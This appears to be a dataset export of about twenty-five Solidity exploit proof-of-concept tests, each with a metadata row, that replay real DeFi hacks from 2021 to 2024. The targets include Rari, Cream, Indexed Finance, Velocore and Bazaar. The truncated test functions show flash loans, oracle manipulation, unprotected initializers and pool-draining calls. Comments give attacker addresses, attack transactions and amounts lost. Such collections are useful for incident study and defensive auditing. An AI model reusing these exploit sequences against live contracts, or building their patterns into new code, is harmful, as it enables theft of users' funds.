IRToke... | exploit_poc | Rikkei | 2022-04 | Rikkei_exp.sol | oracle_manipulation | b7b10d175753b0d8 | 2026-01-07T10:59:16.519812 | postmortems | unknown | 16,956,474 | null | null | null | null | null | null | null | null | false | false | true | medium | null | oracle-manipulation | function testExploit() public {
emit log_named_uint("Before exploit, USDC balance of attacker:", usdc.balanceOf(address(this)));
rbnb.approve(address(cointroller), type(uint256).max);
address[] memory rTokens = new address[](1);
rTokens[0] = address(rbnb);
cointroller.enterMarket... | true | Unknown | 4.08 | low | Rikkei Exploit (2022-04) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
/*
Akutar NFT Denial of Service(DoS) Exploit PoC
There are two serious logic vulnerabilities
1. First can cause a DoS attack due to the missing check if the bidder is a contract. As a result, th... | exploit_poc | AkutarNFT | 2022-04 | AkutarNFT_exp.sol | null | af9bd97b4f1cf2d9 | 2026-01-07T10:59:16.519858 | postmortems | ethereum | 14,636,844 | null | null | null | null | null | null | null | null | false | false | false | medium | null | unknown | function testDOSAttack() public {
address honestUser = 0xca2eB45533a6D5E2657382B0d6Ec01E33a425BF4;
address maliciousUser = address(this); // malicious User is a contract address
cheats.prank(maliciousUser); //maliciousUser makes a bid
akutarNft.bid{value: 3.5 ether}(1);
console.... | true | Unknown | 3.42 | low | AkutarNFT Exploit (2022-04) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity 0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
contract ContractTest is Test {
CheatCodes cheat = CheatCodes(0x7109709ECfa91a80626fF3989D68f67F5b1DD12D);
IBaseV1Router01 router = IBaseV1Router01(0xa38cd27185a464914D3046f0AB9d43356B3482... | exploit_poc | deus | 2022-04 | deus_exp.sol | oracle_manipulation | 3a82055f0016ca7e | 2026-01-07T10:59:16.519908 | postmortems | unknown | 37,093,708 | null | null | null | null | null | null | null | null | false | false | true | medium | null | oracle-manipulation | function testExample() public {
cheat.prank(owner_of_usdc);
usdc.Swapin(
0x33e48143c6ea17476eeabfa202d8034190ea3f2280b643e2570c54265fe33c98, address(this), 150_000_000 * 10 ** 6
);
uint256 balance_of_usdc = usdc.balanceOf(address(this));
emit log_named_uint("The US... | true | Unknown | 5.62 | medium | deus Exploit (2022-04) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
// !! THIS FILE WAS AUTOGENERATED BY abi-to-sol v0.5.3. SEE SOURCE BELOW. !!
pragma solidity >=0.7.0 <0.9.0;
import "forge-std/Test.sol";
import "./../interface.sol";
contract ContractTest is Test {
IERC20 usdc = IERC20(0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48);
ICEth... | exploit_poc | Rari | 2022-04 | Rari_exp.sol | flash_loan | 7ffa961e45cb89fd | 2026-01-07T10:59:16.519959 | postmortems | unknown | 14,684,813 | null | null | null | null | null | null | null | null | false | false | true | medium | null | flash-loan | function testExploit() public {
emit log_named_uint("ETH Balance of fETH_127 before borrowing", address(fETH_127).balance / 1e18);
payable(address(0)).transfer(address(this).balance);
emit log_named_uint("ETH Balance after sending to blackHole", address(this).balance);
address[] memor... | true | Unknown | 4.62 | low | Rari Exploit (2022-04) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
//Credit: W2Ning
pragma solidity 0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
contract ContractTest is Test {
IWBNB wbnb = IWBNB(payable(0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c));
address public BUSD_USDT_Pair = 0x7EFaEf62fDdCCa950418312c6C91Aef3... | exploit_poc | Elephant_Money | 2022-04 | Elephant_Money_exp.sol | null | 32bc54707114ab2b | 2026-01-07T10:59:16.520011 | postmortems | unknown | 16,886,438 | null | null | null | null | null | null | null | null | false | false | false | medium | null | unknown | function testExploit() public {
IPancakePair(BUSDT_WBNB_Pair).swap(0, 100_000 ether, address(this), "0x00");
} | true | Unknown | 4.12 | low | Elephant_Money Exploit (2022-04) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity 0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// source
// https://mp.weixin.qq.com/s/_7vIlVBI9g9IgGpS9OwPIQ
// attack tx: 0xc7647406542f8f2473a06fea142d223022370aa5722c044c2b7ea030b8965dd0
// test result
// > forge test --contracts ./src/cft... | exploit_poc | cftoken | 2022-04 | cftoken_exp.sol | null | eb950f91ef86b90a | 2026-01-07T10:59:16.520066 | postmortems | unknown | 16,841,980 | null | null | null | null | null | null | null | null | false | false | false | medium | null | unknown | function testExploit() public {
emit log_named_uint("Before exploit, cftoken balance:", ICFToken(cftoken).balanceOf(address(msg.sender)));
ICFToken(cftoken)._transfer(cfpair, payable(msg.sender), 1_000_000_000_000_000_000_000);
emit log_named_uint("After exploit, cftoken balance:", ICFToken(cf... | true | Unknown | 2.82 | low | cftoken Exploit (2022-04) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity 0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
contract ContractTest is Test {
IPancakeRouter pancakeRouter = IPancakeRouter(payable(0x6CD71A07E72C514f5d511651F6808c6395353968));
IPancakePair usdtYeedHoSwapPair = IPancakePair(0x33d5e574... | exploit_poc | Zeed | 2022-04 | Zeed_exp.sol | null | 73d4fc78a7ff07aa | 2026-01-07T10:59:16.520110 | postmortems | unknown | 17,132,514 | null | null | null | null | null | null | null | null | false | false | false | medium | null | unknown | function testExploit() public {
yeed.approve(address(pancakeRouter), type(uint256).max);
(uint112 _reserve0, uint112 _reserve1,) = usdtYeedHoSwapPair.getReserves();
usdtYeedHoSwapPair.swap(0, _reserve1 - 1, address(this), new bytes(1));
emit log_named_uint("Before exploit, USDT balance o... | true | Unknown | 3.16 | low | Zeed Exploit (2022-04) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
//Credit: Cache_And_Burn
pragma solidity 0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
/*
Eleven Finance Exploit POC
tx hash: 0x6450d8f4db09972853e948bee44f2cb54b9df786dace774106cd28820e906789
https://peckshield.medium.com/eleven-finance-incident-root-caus... | exploit_poc | Eleven | 2021-06 | Eleven_exp.sol | flash_loan | 7dcfe8b9845dccff | 2026-01-07T10:59:16.520153 | postmortems | unknown | 8,530,973 | null | null | null | null | null | null | null | null | false | false | true | medium | null | flash-loan | function testExploit() public {
console.log("-------Start exploit-------");
console.log("attacker BUSD balance before is", busd.balanceOf(address(this)));
cheats.startPrank(0xc71e2F581b77De945C8A7A191b0B238c81f11eD6);
//Take a flashloan from apeswap
IPancakePair(ape_lp).swap(0... | true | Unknown | 5.05 | medium | Eleven Exploit (2021-06) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
// Attacker : https://bscscan.com/address/0xb63f0d8b9aa0c4e68d5630f54bfefc6cf2c2ad19
// Attack Contract : https://bscscan.com/address/0x67d3737c410f4d206012cad5cb41b2e155061945
// Attack Tx : https://bscscan.com/tx/0xba0fa8c150b2408eec9bbbbfe63f9ca63e99f3... | exploit_poc | xWin | 2021-06 | xWin_exp.sol | flash_loan | 0f20938c803ce8f7 | 2026-01-07T10:59:16.520201 | postmortems | bsc | 8,589,725 | null | null | https://bscscan.com/address/0xb63f0d8b9aa0c4e68d5630f54bfefc6cf2c2ad19 | https://bscscan.com/address/0x67d3737c410f4d206012cad5cb41b2e155061945 | null | https://bscscan.com/tx/0xba0fa8c150b2408eec9bbbbfe63f9ca63e99f3ff53ac46ee08d691883ac05c1d | null | null | false | true | true | medium | null | flash-loan | false | https://bscscan.com/address/0xb63f0d8b9aa0c4e68d5630f54bfefc6cf2c2ad19 | https://bscscan.com/address/0x67d3737c410f4d206012cad5cb41b2e155061945 | https://bscscan.com/tx/0xba0fa8c150b2408eec9bbbbfe63f9ca63e99f3ff53ac46ee08d691883ac05c1d | Unknown | 6 | medium | xWin Exploit (2021-06) | false | false | true | false | |||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity 0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
/*
Vulnerable contract: https://bscscan.com/address/0x109Ea28dbDea5E6ec126FbC8c33845DFe812a300#code
Attack TX: https://bscscan.com/tx/0x765de8357994a206bb90af57dcf427f48a2021f2f28ca81f2c00b... | exploit_poc | PancakeHunny | 2021-06 | PancakeHunny_exp.sol | null | df166a897e20c3ca | 2026-01-07T10:59:16.520279 | postmortems | bsc | 7,962,338 | null | null | null | null | https://bscscan.com/address/0x109Ea28dbDea5E6ec126FbC8c33845DFe812a300#code | https://bscscan.com/tx/0x765de8357994a206bb90af57dcf427f48a2021f2f28ca81f2c00bc3b9842be8e | null | null | false | false | false | medium | null | unknown | function testExploit() public {
wbnb.deposit{value: 5.752 ether}();
wbnb.transfer(address(this), 5.752 ether);
//WBNB was swapped to CAKE at PancakeSwap
address[] memory path = new address[](2);
path[0] = address(wbnb);
path[1] = address(cake);
pancakeRouter.swap... | true | Unknown | 5.69 | medium | PancakeHunny Exploit (2021-06) | false | true | true | false | |||||||
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @Analysis
interface SdoRewardPOOL {
function deposit(uint256 _pid, uint256 _amount) external;
function withdraw(uint256 _pid, uint256 _amount) external;
function harvestAllRewards() external;
function updatePool(
... | exploit_poc | SafeDollar | 2021-06 | SafeDollar_exp.sol | null | 55394bc7c4189f27 | 2026-01-07T10:59:16.520346 | postmortems | unknown | 16,225,172 | null | null | null | null | null | null | null | null | false | true | false | medium | null | unknown | function testExploit() public payable {
PLX.approve(address(Pool), type(uint256).max);
WMATIC.approve(address(Router), type(uint256).max);
(reserve0Pair1, reserve1Pair1,) = Pair1.getReserves();
(reserve0Pair2, reserve1Pair2,) = Pair2.getReserves();
address(WMATIC).call{value: 10_... | true | Unknown | 5 | medium | SafeDollar Exploit (2021-06) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity 0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
contract ContractTest is Test {
CheatCodes cheats = CheatCodes(0x7109709ECfa91a80626fF3989D68f67F5b1DD12D);
I88mph mphNFT = I88mph(0xF0b7DE03134857391d8D43Ed48e20EDF21461097);
function... | exploit_poc | 88mph | 2021-06 | 88mph_exp.sol | null | 0e68dfabcb32f73f | 2026-01-07T10:59:16.520408 | postmortems | unknown | 12,516,705 | null | null | null | null | null | null | null | null | false | false | false | medium | null | unknown | function testExploit() public {
console.log("Before exploiting, NFT contract owner:", mphNFT.owner());
/*
The vulnerability was an unprotected init() function in the code of these specific pools | true | Unknown | 2.81 | low | 88mph Exploit (2021-06) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @Analysis
// https://medium.com/immunefi/hack-analysis-cream-finance-oct-2021-fc222d913fc5
// @TX
// https://etherscan.io/tx/0x0fe2542079644e107cbf13690eb9c2c65963ccb79089ff96bfaf8dced2331c92
/... | exploit_poc | Cream_2 | 2021-10 | Cream_2_exp.sol | flash_loan | da1e7ade50666655 | 2026-01-07T10:59:16.520456 | postmortems | ethereum | 13,499,797 | null | null | null | null | null | null | null | null | false | true | true | medium | null | flash-loan | function testExploit() public {
SecondContract exploitContract = new SecondContract();
secondContract = address(exploitContract);
console.log("[1. Beigin]");
console.log("------------Acquire Capital------------");
console.log("[2. MakerDao FlashLoan 500_000_000 DAI]");
Da... | true | Unknown | 6 | medium | Cream_2 Exploit (2021-10) | false | false | false | false | |||||||
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
// @author: https://github.com/Crypto-Virus/indexed-finance-exploit-example/blob/master/contracts/IndexedAttack.sol
// @Analyses:
// https://blocksecteam.medium.com/the-analysis-of-indexed-finance-security-incident-8a62b9799836
// ... | exploit_poc | IndexedFinance | 2021-10 | IndexedFinance_exp.sol | null | fbdba71c735293fe | 2026-01-07T10:59:16.520594 | postmortems | ethereum | 13,417,948 | null | null | null | null | null | https://etherscan.io/tx/0x44aad3b853866468161735496a5d9cc961ce5aa872924c5d78673076b1cd95aa | null | null | false | false | false | medium | null | unknown | function testHack() public {
address[] memory tokensBorrow = new address[](6);
tokensBorrow[0] = 0x1f9840a85d5aF5bf1D1762F925BDADdC4201F984;
tokensBorrow[1] = 0x7Fc66500c84A76Ad7e9c93437bFc5Ac33E2DDaE9;
tokensBorrow[2] = 0xc00e94Cb662C3520282E6f5717214004A7f26888;
tokensBorrow[3]... | true | Unknown | 6 | medium | IndexedFinance Exploit (2021-10) | false | false | true | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// Profit : ~52777 USD
// Attacker: https://bscscan.com/address/0xb6911dee6a5b1c65ad1ac11a99aec09c2cf83c0e
// Attack Contract: https://bscscan.com/address/0x63b4de190c35f900bb7adf1a13d66fb1f0d624a... | exploit_poc | Will | 2024-06 | Will_exp.sol | null | 47dcd1845ea7a360 | 2026-01-07T10:59:16.520691 | postmortems | bsc | 39,979,796 | null | null | https://bscscan.com/address/0xb6911dee6a5b1c65ad1ac11a99aec09c2cf83c0e | https://bscscan.com/address/0x63b4de190c35f900bb7adf1a13d66fb1f0d624a1#code | null | null | null | null | false | false | false | medium | null | unknown | function attack() public {
USDT.approve(address(trading), type(uint256).max);
trading.placeSellOrder(71_000 ether, 0, 0);
swap_token_to_token(address(USDT), address(will), 88_000 ether);
/////step---2
vm.warp(block.timestamp + 20);
trading.updateExpiredOrders();
t... | true | https://bscscan.com/address/0xb6911dee6a5b1c65ad1ac11a99aec09c2cf83c0e | https://bscscan.com/address/0x63b4de190c35f900bb7adf1a13d66fb1f0d624a1#code | Unknown | 4.32 | low | Will Exploit (2024-06) | false | false | false | false | |||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo -- Total Lost : ~59643 USD
// TX : https://app.blocksec.com/explorer/tx/bsc/0x556419e0a6ee8e6de6b3679605f9f62ad013007419a1b55c9f56590a824bfb52
// Attacker : https://bscscan.com/address... | exploit_poc | INcufi | 2024-06 | INcufi_exp.sol | null | e3552b10bc81b3df | 2026-01-07T10:59:16.520751 | postmortems | bsc | 39,729,927 | ~59643 USD | 59,643 | https://bscscan.com/address/0xb6911dee6a5b1c65ad1ac11a99aec09c2cf83c0e | https://bscscan.com/address/0x4237d006471b38af0e1691c00d96193a8ff5709f | null | null | null | null | true | false | false | medium | ~59643 USD | unknown | function testExploit() public {
emit log_named_decimal_uint("[End] Attacker BUSD before exploit", BUSD.balanceOf(address(this)), 18);
attack();
emit log_named_decimal_uint("[End] Attacker Ncufi after exploit", AKITADEF.balanceOf(address(this)), 18);
emit log_named_decimal_uint("[End] Att... | true | https://bscscan.com/address/0xb6911dee6a5b1c65ad1ac11a99aec09c2cf83c0e | https://bscscan.com/address/0x4237d006471b38af0e1691c00d96193a8ff5709f | $59.6K | 7 | medium | INcufi Exploit (2024-06) | true | false | false | false | |||||
pragma solidity ^0.8.10;
import "../basetest.sol";
import "./../interface.sol";
// Profit : ~3.4 ETH
// Attacker: https://etherscan.io/address/0x394ba273315240510b61ca22ba152e3478a45892
// Attack Contract: https://etherscan.io/address/0x93d4f6f84d242c7959f8d1f1917ddbc9fb925ada
// TX1 : https://etherscan.io/tx/0xda8f6... | exploit_poc | WIFCOIN_ETH | 2024-06 | WIFCOIN_ETH_exp.sol | null | 56478ff278965548 | 2026-01-07T10:59:16.520814 | postmortems | ethereum | 20,103,189 | null | null | https://etherscan.io/address/0x394ba273315240510b61ca22ba152e3478a45892 | https://etherscan.io/address/0x93d4f6f84d242c7959f8d1f1917ddbc9fb925ada | null | null | null | null | false | false | false | medium | null | unknown | function testExploit() public balanceLog {
//Paths
address[] memory buyPath = new address[](2);
buyPath[0] = address(router.WETH()); // weth
buyPath[1] = address(Wif); // token
address[] memory sellPath = new address[](2);
sellPath[0] = buyPath[1];
sellPath[1] = b... | true | https://etherscan.io/address/0x394ba273315240510b61ca22ba152e3478a45892 | https://etherscan.io/address/0x93d4f6f84d242c7959f8d1f1917ddbc9fb925ada | Unknown | 4.16 | low | WIFCOIN_ETH Exploit (2024-06) | false | false | false | false | |||||
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : $6.4K
// Attacker : https://bscscan.com/address/0xd52f125085b70f7f52bd112500a9c334b7246984
// Attack Contract : https://bscscan.com/address/0xfad2a0642a44a68606c2295e69d383700643be68
// Attack Tx : https://bscs... | exploit_poc | NCD | 2024-06 | NCD_exp.sol | flash_loan | 02368c90fb4219c8 | 2026-01-07T10:59:16.520856 | postmortems | bsc | 39,253,639 | $6.4K | 6,400 | https://bscscan.com/address/0xd52f125085b70f7f52bd112500a9c334b7246984 | https://bscscan.com/address/0xfad2a0642a44a68606c2295e69d383700643be68 | null | https://bscscan.com/tx/0xbfb9b3b8a0d3c589a02f06c516b5c7b7569739edd00f9836645080f2148aefc7 | null | null | true | false | true | low | $6.4K | flash-loan | function testExploit() public {
deal(address(usdc_), address(this), 10 ether); //Assume this is an exchange for uniswap, not flashloan!
emit log_named_decimal_uint("ack before usdc_ balance = ", usdc_.balanceOf(address(this)), usdc_.decimals());
address[] memory path = new address[](2);
... | true | $6.4K | https://bscscan.com/address/0xd52f125085b70f7f52bd112500a9c334b7246984 | https://bscscan.com/address/0xfad2a0642a44a68606c2295e69d383700643be68 | https://bscscan.com/tx/0xbfb9b3b8a0d3c589a02f06c516b5c7b7569739edd00f9836645080f2148aefc7 | $6.4K | 8.52 | high | NCD Exploit (2024-06) | true | false | true | false | |||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : 15k
// Attacker : https://bscscan.com/address/0x65bba34c11add305cb2a1f8a68cecbd6e75089cd
// Attack Contract : https://bscscan.com/address/0x73ceea4C6571DbCf9BCc9eA77b1D8... | exploit_poc | Crb2 | 2024-06 | Crb2_exp.sol | flash_loan | e18f3c53ac781372 | 2026-01-07T10:59:16.520907 | postmortems | bsc | null | 15k | 15,000 | https://bscscan.com/address/0x65bba34c11add305cb2a1f8a68cecbd6e75089cd | https://bscscan.com/address/0x73ceea4C6571DbCf9BCc9eA77b1D8107b1D46280 | https://bscscan.com/address/0xee6De822159765daf0Fd72d71529d7ab026ec2f2 | https://bscscan.com/tx/0xde59f5bd65e8f48e5b6137a3b4251afbb9b6240d1036fa6f030e21ab6d950aac | null | null | true | true | true | medium | 15k | flash-loan | function testExploit() public {
vm.startPrank(user, user);
busd.approve(address(router), type(uint256).max);
busd.approve(address(this), type(uint256).max);
crb_token.approve(address(this), type(uint256).max);
vm.stopPrank();
emit log_named_decimal_uint("busd", busd.balan... | true | 15k | https://bscscan.com/address/0x65bba34c11add305cb2a1f8a68cecbd6e75089cd | https://bscscan.com/address/0x73ceea4C6571DbCf9BCc9eA77b1D8107b1D46280 | https://bscscan.com/address/0xee6De822159765daf0Fd72d71529d7ab026ec2f2 | https://bscscan.com/tx/0xde59f5bd65e8f48e5b6137a3b4251afbb9b6240d1036fa6f030e21ab6d950aac | $15.0K | 9.06 | high | Crb2 Exploit (2024-06) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// Profit : ~9 ETH
// TX : https://app.blocksec.com/explorer/tx/eth/0x6beb21b53f5b205c088570333ec875b720e333b49657f7026b01ed72b026851e?line=19
// Attacker : https://etherscan.io/address/0xb297735e... | exploit_poc | APEMAGA | 2024-06 | APEMAGA_exp.sol | null | 542b7ca34c233dff | 2026-01-07T10:59:16.520958 | postmortems | ethereum | 20,175,261 | null | null | https://etherscan.io/address/0xb297735e9fb3e695ccce3963bfe042f318901ea0 | https://etherscan.io/address/0x8de6314058c0b7eea809881d73e69b425c01f0b5#code | https://etherscan.io/address/0x56ff4afd909aa66a1530fe69bf94c74e6d44500c | null | null | null | false | false | false | medium | null | unknown | function attack() public {
swap_token_to_ExactToken(0.1 ether, address(WETH), address(Apemaga), 8000 ether);
// emit log_named_decimal_uint("[End] Attacker token before exploit", Apemaga.balanceOf(address(this)), Apemaga.decimals());
Apemaga.family(address(Pair));
Apemaga.family(address... | true | https://etherscan.io/address/0xb297735e9fb3e695ccce3963bfe042f318901ea0 | https://etherscan.io/address/0x8de6314058c0b7eea809881d73e69b425c01f0b5#code | https://etherscan.io/address/0x56ff4afd909aa66a1530fe69bf94c74e6d44500c | Unknown | 5.39 | medium | APEMAGA Exploit (2024-06) | false | true | false | false | ||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "../basetest.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : ~$91k
// Attacker : https://bscscan.com/address/0xb2d546547168f61debf0a780210b5591e4dd39a8
// Attack Contract : https://bscscan.com/address/0xa4fd1beac3b5fb78a8ec074338152100... | exploit_poc | SteamSwap | 2024-06 | SteamSwap_exp.sol | null | ede6c569bff45a7d | 2026-01-07T10:59:16.521005 | postmortems | bsc | null | ~$91k | 91,000 | https://bscscan.com/address/0xb2d546547168f61debf0a780210b5591e4dd39a8 | https://bscscan.com/address/0xa4fd1beac3b5fb78a8ec074338152100b87437a9 | https://bscscan.com/address/0xb7d0a1adafa3e9e8d8e244c20b6277bee17a09b6 | https://bscscan.com/tx/0x40f3bdd0a3a8d0476ae6aa2875dc2ec60b80812e2a394b67a88260df57c65522 | null | null | true | true | false | medium | ~$91k | unknown | function testExploit() public balanceLog {
//implement exploit code here
ICake_LP(Cake_LP).sync();
uint256 amount0 = 500_000_000_000_000_000_000_000;
IPancakeV3PoolActions(PancakeV3Pool).flash(address(this), amount0, 0, "");
} | true | ~$91k | https://bscscan.com/address/0xb2d546547168f61debf0a780210b5591e4dd39a8 | https://bscscan.com/address/0xa4fd1beac3b5fb78a8ec074338152100b87437a9 | https://bscscan.com/address/0xb7d0a1adafa3e9e8d8e244c20b6277bee17a09b6 | https://bscscan.com/tx/0x40f3bdd0a3a8d0476ae6aa2875dc2ec60b80812e2a394b67a88260df57c65522 | $91.0K | 7.49 | medium | SteamSwap Exploit (2024-06) | true | true | true | false | ||
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// Profit : ~9.2 ETH
// Attacker: https://etherscan.io/address/0xfcd4acbc55df53fbc4c9d275e3495b490635f113
// Attack Contract: https://etherscan.io/address/0x9d3425d45df30183fda059c586543dcdeb5993e6
// TX : https://etherscan.io/tx/0xe82... | exploit_poc | JokInTheBox | 2024-06 | JokInTheBox_exp.sol | flash_loan | fc15fc2da16526f4 | 2026-01-07T10:59:16.521047 | postmortems | ethereum | 20,054,628 | null | null | https://etherscan.io/address/0xfcd4acbc55df53fbc4c9d275e3495b490635f113 | https://etherscan.io/address/0x9d3425d45df30183fda059c586543dcdeb5993e6 | null | null | null | null | false | false | true | medium | null | flash-loan | function testExploit() public {
address[] memory path = new address[](2);
path[0] = address(weth_); // weth
path[1] = address(jok_); // token
vm.deal(address(this), 0.2 ether); // flashLoan
router_.swapExactETHForTokens{value: 0.2 ether}(0, path, address(this), block.timestamp);... | true | https://etherscan.io/address/0xfcd4acbc55df53fbc4c9d275e3495b490635f113 | https://etherscan.io/address/0x9d3425d45df30183fda059c586543dcdeb5993e6 | Unknown | 5.16 | medium | JokInTheBox Exploit (2024-06) | false | false | false | false | |||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : $13.8K
// Attack Tx : https://app.blocksec.com/explorer/tx/bsc/0x849ed7f687cc2ebd1f7c4bed0849893e829a74f512b7f4a18aea39a3ef4d83b1
// Attacker Address : https://bscscan.... | exploit_poc | MineSTM | 2024-06 | MineSTM_exp.sol | null | 2f097f10f54f5277 | 2026-01-07T10:59:16.521092 | postmortems | bsc | 39,383,150 | $13.8K | 13,800 | null | https://bscscan.com/address/0x88c17622d33b327268924e9f90a9e475a244e3ab | null | https://app.blocksec.com/explorer/tx/bsc/0x849ed7f687cc2ebd1f7c4bed0849893e829a74f512b7f4a18aea39a3ef4d83b1 | null | null | true | false | false | medium | $13.8K | unknown | function testExploit() public {
BUSDT_USDC.flash(address(this), flashBUSDTAmount, 0, abi.encodePacked(uint256(1)));
emit log_named_decimal_uint("Profit: ", BUSDT.balanceOf(address(this)), 18);
} | true | $13.8K | https://bscscan.com/address/0x88c17622d33b327268924e9f90a9e475a244e3ab | https://app.blocksec.com/explorer/tx/bsc/0x849ed7f687cc2ebd1f7c4bed0849893e829a74f512b7f4a18aea39a3ef4d83b1 | $13.8K | 6.09 | medium | MineSTM Exploit (2024-06) | true | false | true | false | ||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : $6.88M
// Attack Tx : https://lineascan.build/tx/0xed11d5b013bf3296b1507da38b7bcb97845dd037d33d3d1b0c5e763889cdbed1
// Attacker Address : https://lineascan.build/addres... | exploit_poc | Velocore | 2024-06 | Velocore_exp.sol | null | 1591fd5c41cc8fbb | 2026-01-07T10:59:16.521143 | postmortems | unknown | 5,079,177 | $6.88M | 6,880,000 | null | https://lineascan.build/address/0xb7f6354b2cfd3018b3261fbc63248a56a24ae91a | null | https://lineascan.build/tx/0xed11d5b013bf3296b1507da38b7bcb97845dd037d33d3d1b0c5e763889cdbed1 | null | null | true | true | false | critical | $6.88M | unknown | function testExploit() public {
// 1. Check the total Supply Before Attack of VLP
uint256 totalSupplyBeforeAttack = ConstantProductPool(USDC_ETH_VLP).totalSupply();
// console.log("total Supply Before Attack:", totalSupplyBeforeAttack);
// 2. Call velocore__execute function three times... | true | $6.88M | https://lineascan.build/address/0xb7f6354b2cfd3018b3261fbc63248a56a24ae91a | https://lineascan.build/tx/0xed11d5b013bf3296b1507da38b7bcb97845dd037d33d3d1b0c5e763889cdbed1 | $6.88M | 7.77 | medium | Velocore Exploit (2024-06) | true | false | true | false | ||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "../basetest.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : 1.4M
// Attacker : https://blastscan.io/address/0x3cf5B87726Af770c94494E886d2A69c42A203884
// Attack Contract : https://blastscan.io/address/0xd31c7a22f4e6f928f1d4adabbc08c... | exploit_poc | Bazaar | 2024-06 | Bazaar_exp.sol | null | 8a5d7098926b3495 | 2026-01-07T10:59:16.521201 | postmortems | unknown | null | 1.4M | 1,400,000 | https://blastscan.io/address/0x3cf5B87726Af770c94494E886d2A69c42A203884 | https://blastscan.io/address/0xd31c7a22f4e6f928f1d4adabbc08c7bf88a3e402 | https://blastscan.io/address/0xefb4e3Cc438eF2854727A7Df0d0baf844484EdaB | https://blastscan.io/tx/0x7fdd140f7631f62d62f7256ee4a38af51a4723ad5d66adc9b9685bf78f750f2d | null | https://x.com/shoucccc/status/1800353122159833195 | true | true | false | critical | 1.4M | unknown | function testExploit() public balanceLog {
vulnVault.exitPool(TARGET_ID, HOLDER_TO_TAKE_FROM, payable(address(this)), buildExitPoolRequest());
assertEq(getFundingBal(), EXPECTED_ETH, "Did not get expected ETH");
} | true | 1.4M | https://blastscan.io/address/0x3cf5B87726Af770c94494E886d2A69c42A203884 | https://blastscan.io/address/0xd31c7a22f4e6f928f1d4adabbc08c7bf88a3e402 | https://blastscan.io/address/0xefb4e3Cc438eF2854727A7Df0d0baf844484EdaB | https://blastscan.io/tx/0x7fdd140f7631f62d62f7256ee4a38af51a4723ad5d66adc9b9685bf78f750f2d | https://x.com/shoucccc/status/1800353122159833195 | $1.40M | 7.32 | medium | Bazaar Exploit (2024-06) | true | true | true | false |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.